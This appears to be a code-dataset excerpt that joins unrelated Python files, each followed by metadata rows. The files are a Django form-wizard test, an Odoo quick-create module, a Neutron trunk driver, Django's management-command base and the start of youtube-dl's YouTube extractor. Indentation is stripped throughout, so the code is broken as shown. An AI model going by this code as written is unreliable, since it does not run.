from django.contrib.formtools.wizard.views import NamedUrlWizardView
temp_storage_location = tempfile.mkdtemp(dir=os.environ.get('DJANGO_TEST_TEMP_DIR'))
temp_storage = FileSystemStorage(location=temp_storage_location)
class Page1(forms.Form):
name = forms.CharField(max_length=100)
user = forms.ModelChoiceField(queryset=User.objects.all())
thirsty = forms.NullBooleanField()
class Page2(forms.Form):
address1 = forms.CharField(max_length=100)
address2 = forms.CharField(max_length=100)
file1 = forms.FileField()
class Page3(forms.Form):
random_crap = forms.CharField(max_length=100)
Page4 = formset_factory(Page3, extra=2)
class ContactWizard(NamedUrlWizardView):
file_storage = temp_storage
def done(self, form_list, **kwargs):
c = Context({
'form_list': [x.cleaned_data for x in form_list],
'form_dict': kwargs.get('form_dict'),
'all_cleaned_data': self.get_all_cleaned_data()
})
for form in self.form_list.keys():
c[form] = self.get_cleaned_data_for_step(form)
c['this_will_fail'] = self.get_cleaned_data_for_step('this_will_fail')
return HttpResponse(Template('').render(c))
class SessionContactWizard(ContactWizard):
storage_name = 'django.contrib.formtools.wizard.storage.session.SessionStorage'
class CookieContactWizard(ContactWizard):
storage_name = 'django.contrib.formtools.wizard.storage.cookie.CookieStorage'
| bsd-3-clause | -1,027,926,735,189,552,300 | 29.344828 | 84 | 0.723864 | false |
jjscarafia/server-tools | base_optional_quick_create/model.py | 41 | 2507 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2013 Agile Business Group sagl (<http://www.agilebg.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
from openerp import SUPERUSER_ID
from openerp.tools.translate import _
class ir_model(orm.Model):
_inherit = 'ir.model'
_columns = {
'avoid_quick_create': fields.boolean('Avoid quick create'),
}
def _wrap_name_create(self, old_create, model):
def wrapper(cr, uid, name, context=None):
raise orm.except_orm(
_('Error'),
_("Can't create quickly. Opening create form"))
return wrapper
def _register_hook(self, cr, ids=None):
if ids is None:
ids = self.search(cr, SUPERUSER_ID, [])
for model in self.browse(cr, SUPERUSER_ID, ids):
if model.avoid_quick_create:
model_name = model.model
model_obj = self.pool.get(model_name)
if model_obj and not hasattr(model_obj, 'check_quick_create'):
model_obj.name_create = self._wrap_name_create(
model_obj.name_create, model_name)
model_obj.check_quick_create = True
return True
def create(self, cr, uid, vals, context=None):
res_id = super(ir_model, self).create(cr, uid, vals, context=context)
self._register_hook(cr, [res_id])
return res_id
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
res = super(ir_model, self).write(cr, uid, ids, vals, context=context)
self._register_hook(cr, ids)
return res
| agpl-3.0 | -2,564,209,502,535,694,300 | 38.793651 | 78 | 0.579976 | false |
cloudbase/neutron | neutron/services/trunk/drivers/linuxbridge/driver.py | 4 | 1688 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from neutron_lib import constants
from neutron.extensions import portbindings
from neutron.services.trunk import constants as trunk_consts
from neutron.services.trunk.drivers import base
LOG = logging.getLogger(__name__)
NAME = 'linuxbridge'
SUPPORTED_INTERFACES = (
portbindings.VIF_TYPE_BRIDGE,
)
SUPPORTED_SEGMENTATION_TYPES = (
trunk_consts.VLAN,
)
class LinuxBridgeDriver(base.DriverBase):
"""Server-side Trunk driver for the ML2 Linux Bridge driver."""
@property
def is_loaded(self):
try:
return NAME in cfg.CONF.ml2.mechanism_drivers
except cfg.NoSuchOptError:
return False
@classmethod
def create(cls):
return cls(NAME, SUPPORTED_INTERFACES, SUPPORTED_SEGMENTATION_TYPES,
constants.AGENT_TYPE_LINUXBRIDGE, can_trunk_bound_port=True)
def register():
# NOTE(kevinbenton): the thing that is keeping this from being
# immediately garbage collected is that it registers callbacks
LinuxBridgeDriver.create()
LOG.debug("Linux bridge trunk driver initialized.")
| apache-2.0 | -9,081,539,082,100,173,000 | 30.849057 | 79 | 0.73519 | false |
caot/intellij-community | python/lib/Lib/site-packages/django/core/management/base.py | 248 | 16452 | """
Base classes for writing management commands (named commands which can
be executed through ``django-admin.py`` or ``manage.py``).
"""
import os
import sys
from optparse import make_option, OptionParser
import django
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import color_style
from django.utils.encoding import smart_str
class CommandError(Exception):
"""
Exception class indicating a problem while executing a management
command.
If this exception is raised during the execution of a management
command, it will be caught and turned into a nicely-printed error
message to the appropriate output stream (i.e., stderr); as a
result, raising this exception (with a sensible description of the
error) is the preferred way to indicate that something has gone
wrong in the execution of a command.
"""
pass
def handle_default_options(options):
"""
Include any default options that all commands should accept here
so that ManagementUtility can handle them before searching for
user commands.
"""
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
if options.pythonpath:
sys.path.insert(0, options.pythonpath)
class BaseCommand(object):
"""
The base class from which all management commands ultimately
derive.
Use this class if you want access to all of the mechanisms which
parse the command-line arguments and work out what code to call in
response; if you don't need to change any of that behavior,
consider using one of the subclasses defined in this file.
If you are interested in overriding/customizing various aspects of
the command-parsing and -execution behavior, the normal flow works
as follows:
1. ``django-admin.py`` or ``manage.py`` loads the command class
and calls its ``run_from_argv()`` method.
2. The ``run_from_argv()`` method calls ``create_parser()`` to get
an ``OptionParser`` for the arguments, parses them, performs
any environment changes requested by options like
``pythonpath``, and then calls the ``execute()`` method,
passing the parsed arguments.
3. The ``execute()`` method attempts to carry out the command by
calling the ``handle()`` method with the parsed arguments; any
output produced by ``handle()`` will be printed to standard
output and, if the command is intended to produce a block of
SQL statements, will be wrapped in ``BEGIN`` and ``COMMIT``.
4. If ``handle()`` raised a ``CommandError``, ``execute()`` will
instead print an error message to ``stderr``.
Thus, the ``handle()`` method is typically the starting point for
subclasses; many built-in commands and command types either place
all of their logic in ``handle()``, or perform some additional
parsing work in ``handle()`` and then delegate from it to more
specialized methods as needed.
Several attributes affect behavior at various steps along the way:
``args``
A string listing the arguments accepted by the command,
suitable for use in help messages; e.g., a command which takes
a list of application names might set this to '<appname
appname ...>'.
``can_import_settings``
A boolean indicating whether the command needs to be able to
import Django settings; if ``True``, ``execute()`` will verify
that this is possible before proceeding. Default value is
``True``.
``help``
A short description of the command, which will be printed in
help messages.
``option_list``
This is the list of ``optparse`` options which will be fed
into the command's ``OptionParser`` for parsing arguments.
``output_transaction``
A boolean indicating whether the command outputs SQL
statements; if ``True``, the output will automatically be
wrapped with ``BEGIN;`` and ``COMMIT;``. Default value is
``False``.
``requires_model_validation``
A boolean; if ``True``, validation of installed models will be
performed prior to executing the command. Default value is
``True``. To validate an individual application's models
rather than all applications' models, call
``self.validate(app)`` from ``handle()``, where ``app`` is the
application's Python module.
"""
# Metadata about this command.
option_list = (
make_option('-v', '--verbosity', action='store', dest='verbosity', default='1',
type='choice', choices=['0', '1', '2', '3'],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all output'),
make_option('--settings',
help='The Python path to a settings module, e.g. "myproject.settings.main". If this isn\'t provided, the DJANGO_SETTINGS_MODULE environment variable will be used.'),
make_option('--pythonpath',
help='A directory to add to the Python path, e.g. "/home/djangoprojects/myproject".'),
make_option('--traceback', action='store_true',
help='Print traceback on exception'),
)
help = ''
args = ''
# Configuration shortcuts that alter various logic.
can_import_settings = True
requires_model_validation = True
output_transaction = False # Whether to wrap the output in a "BEGIN; COMMIT;"
def __init__(self):
self.style = color_style()
def get_version(self):
"""
Return the Django version, which should be correct for all
built-in Django commands. User-supplied commands should
override this method.
"""
return django.get_version()
def usage(self, subcommand):
"""
Return a brief description of how to use this command, by
default from the attribute ``self.help``.
"""
usage = '%%prog %s [options] %s' % (subcommand, self.args)
if self.help:
return '%s\n\n%s' % (usage, self.help)
else:
return usage
def create_parser(self, prog_name, subcommand):
"""
Create and return the ``OptionParser`` which will be used to
parse the arguments to this command.
"""
return OptionParser(prog=prog_name,
usage=self.usage(subcommand),
version=self.get_version(),
option_list=self.option_list)
def print_help(self, prog_name, subcommand):
"""
Print the help message for this command, derived from
``self.usage()``.
"""
parser = self.create_parser(prog_name, subcommand)
parser.print_help()
def run_from_argv(self, argv):
"""
Set up any environment changes requested (e.g., Python path
and Django settings), then run this command.
"""
parser = self.create_parser(argv[0], argv[1])
options, args = parser.parse_args(argv[2:])
handle_default_options(options)
self.execute(*args, **options.__dict__)
def execute(self, *args, **options):
"""
Try to execute this command, performing model validation if
needed (as controlled by the attribute
``self.requires_model_validation``). If the command raises a
``CommandError``, intercept it and print it sensibly to
stderr.
"""
# Switch to English, because django-admin.py creates database content
# like permissions, and those shouldn't contain any translations.
# But only do this if we can assume we have a working settings file,
# because django.utils.translation requires settings.
if self.can_import_settings:
try:
from django.utils import translation
translation.activate('en-us')
except ImportError, e:
# If settings should be available, but aren't,
# raise the error and quit.
sys.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
try:
self.stdout = options.get('stdout', sys.stdout)
self.stderr = options.get('stderr', sys.stderr)
if self.requires_model_validation:
self.validate()
output = self.handle(*args, **options)
if output:
if self.output_transaction:
# This needs to be imported here, because it relies on
# settings.
from django.db import connections, DEFAULT_DB_ALIAS
connection = connections[options.get('database', DEFAULT_DB_ALIAS)]
if connection.ops.start_transaction_sql():
self.stdout.write(self.style.SQL_KEYWORD(connection.ops.start_transaction_sql()) + '\n')
self.stdout.write(output)
if self.output_transaction:
self.stdout.write('\n' + self.style.SQL_KEYWORD("COMMIT;") + '\n')
except CommandError, e:
self.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
def validate(self, app=None, display_num_errors=False):
"""
Validates the given app, raising CommandError for any errors.
If app is None, then this will validate all installed apps.
"""
from django.core.management.validation import get_validation_errors
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
s = StringIO()
num_errors = get_validation_errors(s, app)
if num_errors:
s.seek(0)
error_text = s.read()
raise CommandError("One or more models did not validate:\n%s" % error_text)
if display_num_errors:
self.stdout.write("%s error%s found\n" % (num_errors, num_errors != 1 and 's' or ''))
def handle(self, *args, **options):
"""
The actual logic of the command. Subclasses must implement
this method.
"""
raise NotImplementedError()
class AppCommand(BaseCommand):
"""
A management command which takes one or more installed application
names as arguments, and does something with each of them.
Rather than implementing ``handle()``, subclasses must implement
``handle_app()``, which will be called once for each application.
"""
args = '<appname appname ...>'
def handle(self, *app_labels, **options):
from django.db import models
if not app_labels:
raise CommandError('Enter at least one appname.')
try:
app_list = [models.get_app(app_label) for app_label in app_labels]
except (ImproperlyConfigured, ImportError), e:
raise CommandError("%s. Are you sure your INSTALLED_APPS setting is correct?" % e)
output = []
for app in app_list:
app_output = self.handle_app(app, **options)
if app_output:
output.append(app_output)
return '\n'.join(output)
def handle_app(self, app, **options):
"""
Perform the command's actions for ``app``, which will be the
Python module corresponding to an application name given on
the command line.
"""
raise NotImplementedError()
class LabelCommand(BaseCommand):
"""
A management command which takes one or more arbitrary arguments
(labels) on the command line, and does something with each of
them.
Rather than implementing ``handle()``, subclasses must implement
``handle_label()``, which will be called once for each label.
If the arguments should be names of installed applications, use
``AppCommand`` instead.
"""
args = '<label label ...>'
label = 'label'
def handle(self, *labels, **options):
if not labels:
raise CommandError('Enter at least one %s.' % self.label)
output = []
for label in labels:
label_output = self.handle_label(label, **options)
if label_output:
output.append(label_output)
return '\n'.join(output)
def handle_label(self, label, **options):
"""
Perform the command's actions for ``label``, which will be the
string as given on the command line.
"""
raise NotImplementedError()
class NoArgsCommand(BaseCommand):
"""
A command which takes no arguments on the command line.
Rather than implementing ``handle()``, subclasses must implement
``handle_noargs()``; ``handle()`` itself is overridden to ensure
no arguments are passed to the command.
Attempting to pass arguments will raise ``CommandError``.
"""
args = ''
def handle(self, *args, **options):
if args:
raise CommandError("Command doesn't accept any arguments")
return self.handle_noargs(**options)
def handle_noargs(self, **options):
"""
Perform this command's actions.
"""
raise NotImplementedError()
def copy_helper(style, app_or_project, name, directory, other_name=''):
"""
Copies either a Django application layout template or a Django project
layout template into the specified directory.
"""
# style -- A color style object (see django.core.management.color).
# app_or_project -- The string 'app' or 'project'.
# name -- The name of the application or project.
# directory -- The directory to which the layout template should be copied.
# other_name -- When copying an application layout, this should be the name
# of the project.
import re
import shutil
other = {'project': 'app', 'app': 'project'}[app_or_project]
if not re.search(r'^[_a-zA-Z]\w*$', name): # If it's not a valid directory name.
# Provide a smart error message, depending on the error.
if not re.search(r'^[_a-zA-Z]', name):
message = 'make sure the name begins with a letter or underscore'
else:
message = 'use only numbers, letters and underscores'
raise CommandError("%r is not a valid %s name. Please %s." % (name, app_or_project, message))
top_dir = os.path.join(directory, name)
try:
os.mkdir(top_dir)
except OSError, e:
raise CommandError(e)
# Determine where the app or project templates are. Use
# django.__path__[0] because we don't know into which directory
# django has been installed.
template_dir = os.path.join(django.__path__[0], 'conf', '%s_template' % app_or_project)
for d, subdirs, files in os.walk(template_dir):
relative_dir = d[len(template_dir)+1:].replace('%s_name' % app_or_project, name)
if relative_dir:
os.mkdir(os.path.join(top_dir, relative_dir))
for subdir in subdirs[:]:
if subdir.startswith('.'):
subdirs.remove(subdir)
for f in files:
if not f.endswith('.py'):
# Ignore .pyc, .pyo, .py.class etc, as they cause various
# breakages.
continue
path_old = os.path.join(d, f)
path_new = os.path.join(top_dir, relative_dir, f.replace('%s_name' % app_or_project, name))
fp_old = open(path_old, 'r')
fp_new = open(path_new, 'w')
fp_new.write(fp_old.read().replace('{{ %s_name }}' % app_or_project, name).replace('{{ %s_name }}' % other, other_name))
fp_old.close()
fp_new.close()
try:
shutil.copymode(path_old, path_new)
_make_writeable(path_new)
except OSError:
sys.stderr.write(style.NOTICE("Notice: Couldn't set permission bits on %s. You're probably using an uncommon filesystem setup. No problem.\n" % path_new))
def _make_writeable(filename):
"""
Make sure that the file is writeable. Useful if our source is
read-only.
"""
import stat
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
| apache-2.0 | 5,640,662,413,334,929,000 | 37.171694 | 177 | 0.617372 | false |
jonyroda97/redbot-amigosprovaveis | lib/youtube_dl/extractor/youtube.py | 1 | 131830 | # coding: utf-8
from __future__ import unicode_literals
import itertools
import json
import os.path
import random
import re
import time
import traceback
from .common import InfoExtractor, SearchInfoExtractor
from ..jsinterp import JSInterpreter
from ..swfinterp import SWFInterpreter
from ..compat import (
compat_chr,
compat_kwargs,
compat_parse_qs,
compat_urllib_parse_unquote,
compat_urllib_parse_unquote_plus,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urlparse,
compat_str,
)
from ..utils import (
clean_html,
error_to_compat_str,
ExtractorError,
float_or_none,
get_element_by_attribute,
get_element_by_id,
int_or_none,
mimetype2ext,
orderedSet,
parse_codecs,
parse_duration,
qualities,
remove_quotes,
remove_start,
smuggle_url,
str_to_int,
try_get,
unescapeHTML,
unified_strdate,
unsmuggle_url,
uppercase_escape,
urlencode_postdata,
)
class YoutubeBaseInfoExtractor(InfoExtractor):
"""Provide base functions for Youtube extractors"""
_LOGIN_URL = 'https://accounts.google.com/ServiceLogin'
_TWOFACTOR_URL = 'https://accounts.google.com/signin/challenge'
_LOOKUP_URL = 'https://accounts.google.com/_/signin/sl/lookup'
_CHALLENGE_URL = 'https://accounts.google.com/_/signin/sl/challenge'
_TFA_URL = 'https://accounts.google.com/_/signin/challenge?hl=en&TL={0}'
_NETRC_MACHINE = 'youtube'
# If True it will raise an error if no login info is provided
_LOGIN_REQUIRED = False
_PLAYLIST_ID_RE = r'(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)[0-9A-Za-z-_]{10,}'
def _set_language(self):
self._set_cookie(
'.youtube.com', 'PREF', 'f1=50000000&hl=en',
# YouTube sets the expire time to about two months
expire_time=time.time() + 2 * 30 * 24 * 3600)
def _ids_to_results(self, ids):
return [
self.url_result(vid_id, 'Youtube', video_id=vid_id)
for vid_id in ids]
def _login(self):
"""
Attempt to log in to YouTube.
True is returned if successful or skipped.
False is returned if login failed.
If _LOGIN_REQUIRED is set and no authentication was provided, an error is raised.
"""
username, password = self._get_login_info()
# No authentication to be performed
if username is None:
if self._LOGIN_REQUIRED and self._downloader.params.get('cookiefile') is None:
raise ExtractorError('No login info available, needed for using %s.' % self.IE_NAME, expected=True)
return True
login_page = self._download_webpage(
self._LOGIN_URL, None,
note='Downloading login page',
errnote='unable to fetch login page', fatal=False)
if login_page is False:
return
login_form = self._hidden_inputs(login_page)
def req(url, f_req, note, errnote):
data = login_form.copy()
data.update({
'pstMsg': 1,
'checkConnection': 'youtube',
'checkedDomains': 'youtube',
'hl': 'en',
'deviceinfo': '[null,null,null,[],null,"US",null,null,[],"GlifWebSignIn",null,[null,null,[]]]',
'f.req': json.dumps(f_req),
'flowName': 'GlifWebSignIn',
'flowEntry': 'ServiceLogin',
})
return self._download_json(
url, None, note=note, errnote=errnote,
transform_source=lambda s: re.sub(r'^[^[]*', '', s),
fatal=False,
data=urlencode_postdata(data), headers={
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
'Google-Accounts-XSRF': 1,
})
def warn(message):
self._downloader.report_warning(message)
lookup_req = [
username,
None, [], None, 'US', None, None, 2, False, True,
[
None, None,
[2, 1, None, 1,
'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn',
None, [], 4],
1, [None, None, []], None, None, None, True
],
username,
]
lookup_results = req(
self._LOOKUP_URL, lookup_req,
'Looking up account info', 'Unable to look up account info')
if lookup_results is False:
return False
user_hash = try_get(lookup_results, lambda x: x[0][2], compat_str)
if not user_hash:
warn('Unable to extract user hash')
return False
challenge_req = [
user_hash,
None, 1, None, [1, None, None, None, [password, None, True]],
[
None, None, [2, 1, None, 1, 'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn', None, [], 4],
1, [None, None, []], None, None, None, True
]]
challenge_results = req(
self._CHALLENGE_URL, challenge_req,
'Logging in', 'Unable to log in')
if challenge_results is False:
return
login_res = try_get(challenge_results, lambda x: x[0][5], list)
if login_res:
login_msg = try_get(login_res, lambda x: x[5], compat_str)
warn(
'Unable to login: %s' % 'Invalid password'
if login_msg == 'INCORRECT_ANSWER_ENTERED' else login_msg)
return False
res = try_get(challenge_results, lambda x: x[0][-1], list)
if not res:
warn('Unable to extract result entry')
return False
login_challenge = try_get(res, lambda x: x[0][0], list)
if login_challenge:
challenge_str = try_get(login_challenge, lambda x: x[2], compat_str)
if challenge_str == 'TWO_STEP_VERIFICATION':
# SEND_SUCCESS - TFA code has been successfully sent to phone
# QUOTA_EXCEEDED - reached the limit of TFA codes
status = try_get(login_challenge, lambda x: x[5], compat_str)
if status == 'QUOTA_EXCEEDED':
warn('Exceeded the limit of TFA codes, try later')
return False
tl = try_get(challenge_results, lambda x: x[1][2], compat_str)
if not tl:
warn('Unable to extract TL')
return False
tfa_code = self._get_tfa_info('2-step verification code')
if not tfa_code:
warn(
'Two-factor authentication required. Provide it either interactively or with --twofactor <code>'
'(Note that only TOTP (Google Authenticator App) codes work at this time.)')
return False
tfa_code = remove_start(tfa_code, 'G-')
tfa_req = [
user_hash, None, 2, None,
[
9, None, None, None, None, None, None, None,
[None, tfa_code, True, 2]
]]
tfa_results = req(
self._TFA_URL.format(tl), tfa_req,
'Submitting TFA code', 'Unable to submit TFA code')
if tfa_results is False:
return False
tfa_res = try_get(tfa_results, lambda x: x[0][5], list)
if tfa_res:
tfa_msg = try_get(tfa_res, lambda x: x[5], compat_str)
warn(
'Unable to finish TFA: %s' % 'Invalid TFA code'
if tfa_msg == 'INCORRECT_ANSWER_ENTERED' else tfa_msg)
return False
check_cookie_url = try_get(
tfa_results, lambda x: x[0][-1][2], compat_str)
else:
CHALLENGES = {
'LOGIN_CHALLENGE': "This device isn't recognized. For your security, Google wants to make sure it's really you.",
'USERNAME_RECOVERY': 'Please provide additional information to aid in the recovery process.',
'REAUTH': "There is something unusual about your activity. For your security, Google wants to make sure it's really you.",
}
challenge = CHALLENGES.get(
challenge_str,
'%s returned error %s.' % (self.IE_NAME, challenge_str))
warn('%s\nGo to https://accounts.google.com/, login and solve a challenge.' % challenge)
return False
else:
check_cookie_url = try_get(res, lambda x: x[2], compat_str)
if not check_cookie_url:
warn('Unable to extract CheckCookie URL')
return False
check_cookie_results = self._download_webpage(
check_cookie_url, None, 'Checking cookie', fatal=False)
if check_cookie_results is False:
return False
if 'https://myaccount.google.com/' not in check_cookie_results:
warn('Unable to log in')
return False
return True
def _download_webpage_handle(self, *args, **kwargs):
kwargs.setdefault('query', {})['disable_polymer'] = 'true'
return super(YoutubeBaseInfoExtractor, self)._download_webpage_handle(
*args, **compat_kwargs(kwargs))
def _real_initialize(self):
if self._downloader is None:
return
self._set_language()
if not self._login():
return
class YoutubeEntryListBaseInfoExtractor(YoutubeBaseInfoExtractor):
# Extract entries from page with "Load more" button
def _entries(self, page, playlist_id):
more_widget_html = content_html = page
for page_num in itertools.count(1):
for entry in self._process_page(content_html):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), playlist_id,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
if not content_html.strip():
# Some webpages show a "Load more" button but they don't
# have more videos
break
more_widget_html = more['load_more_widget_html']
class YoutubePlaylistBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for video_id, video_title in self.extract_videos_from_page(content):
yield self.url_result(video_id, 'Youtube', video_id, video_title)
def extract_videos_from_page(self, page):
ids_in_page = []
titles_in_page = []
for mobj in re.finditer(self._VIDEO_RE, page):
# The link with index 0 is not the first video of the playlist (not sure if still actual)
if 'index' in mobj.groupdict() and mobj.group('id') == '0':
continue
video_id = mobj.group('id')
video_title = unescapeHTML(mobj.group('title'))
if video_title:
video_title = video_title.strip()
try:
idx = ids_in_page.index(video_id)
if video_title and not titles_in_page[idx]:
titles_in_page[idx] = video_title
except ValueError:
ids_in_page.append(video_id)
titles_in_page.append(video_title)
return zip(ids_in_page, titles_in_page)
class YoutubePlaylistsBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for playlist_id in orderedSet(re.findall(
r'<h3[^>]+class="[^"]*yt-lockup-title[^"]*"[^>]*><a[^>]+href="/?playlist\?list=([0-9A-Za-z-_]{10,})"',
content)):
yield self.url_result(
'https://www.youtube.com/playlist?list=%s' % playlist_id, 'YoutubePlaylist')
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
title = self._og_search_title(webpage, fatal=False)
return self.playlist_result(self._entries(webpage, playlist_id), playlist_id, title)
class YoutubeIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com'
_VALID_URL = r"""(?x)^
(
(?:https?://|//) # http(s):// or protocol-independent URL
(?:(?:(?:(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/|
(?:www\.)?deturl\.com/www\.youtube\.com/|
(?:www\.)?pwnyoutube\.com/|
(?:www\.)?hooktube\.com/|
(?:www\.)?yourepeat\.com/|
tube\.majestyc\.net/|
youtube\.googleapis\.com/) # the various hostnames, with wildcard subdomains
(?:.*?\#/)? # handle anchor (#/) redirect urls
(?: # the various things that can precede the ID:
(?:(?:v|embed|e)/(?!videoseries)) # v/ or embed/ or e/
|(?: # or the v= param in all its forms
(?:(?:watch|movie)(?:_popup)?(?:\.php)?/?)? # preceding watch(_popup|.php) or nothing (like /?v=xxxx)
(?:\?|\#!?) # the params delimiter ? or # or #!
(?:.*?[&;])?? # any other preceding param (like /?s=tuff&v=xxxx or ?s=tuff&v=V36LpHqtcDY)
v=
)
))
|(?:
youtu\.be| # just youtu.be/xxxx
vid\.plus| # or vid.plus/xxxx
zwearz\.com/watch| # or zwearz.com/watch/xxxx
)/
|(?:www\.)?cleanvideosearch\.com/media/action/yt/watch\?videoId=
)
)? # all until now is optional -> you can pass the naked ID
([0-9A-Za-z_-]{11}) # here is it! the YouTube video ID
(?!.*?\blist=
(?:
%(playlist_id)s| # combined list/video URLs are handled by the playlist IE
WL # WL are handled by the watch later IE
)
)
(?(1).+)? # if we found the ID, everything can follow
$""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_NEXT_URL_RE = r'[\?&]next_url=([^&]+)'
_formats = {
'5': {'ext': 'flv', 'width': 400, 'height': 240, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'6': {'ext': 'flv', 'width': 450, 'height': 270, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'13': {'ext': '3gp', 'acodec': 'aac', 'vcodec': 'mp4v'},
'17': {'ext': '3gp', 'width': 176, 'height': 144, 'acodec': 'aac', 'abr': 24, 'vcodec': 'mp4v'},
'18': {'ext': 'mp4', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 96, 'vcodec': 'h264'},
'22': {'ext': 'mp4', 'width': 1280, 'height': 720, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'34': {'ext': 'flv', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'35': {'ext': 'flv', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# itag 36 videos are either 320x180 (BaW_jenozKc) or 320x240 (__2ABJjxzNo), abr varies as well
'36': {'ext': '3gp', 'width': 320, 'acodec': 'aac', 'vcodec': 'mp4v'},
'37': {'ext': 'mp4', 'width': 1920, 'height': 1080, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'38': {'ext': 'mp4', 'width': 4096, 'height': 3072, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'43': {'ext': 'webm', 'width': 640, 'height': 360, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'44': {'ext': 'webm', 'width': 854, 'height': 480, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'45': {'ext': 'webm', 'width': 1280, 'height': 720, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'46': {'ext': 'webm', 'width': 1920, 'height': 1080, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'59': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'78': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# 3D videos
'82': {'ext': 'mp4', 'height': 360, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'83': {'ext': 'mp4', 'height': 480, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'84': {'ext': 'mp4', 'height': 720, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'85': {'ext': 'mp4', 'height': 1080, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'100': {'ext': 'webm', 'height': 360, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8', 'preference': -20},
'101': {'ext': 'webm', 'height': 480, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
'102': {'ext': 'webm', 'height': 720, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
# Apple HTTP Live Streaming
'91': {'ext': 'mp4', 'height': 144, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'92': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'93': {'ext': 'mp4', 'height': 360, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'94': {'ext': 'mp4', 'height': 480, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'95': {'ext': 'mp4', 'height': 720, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'96': {'ext': 'mp4', 'height': 1080, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
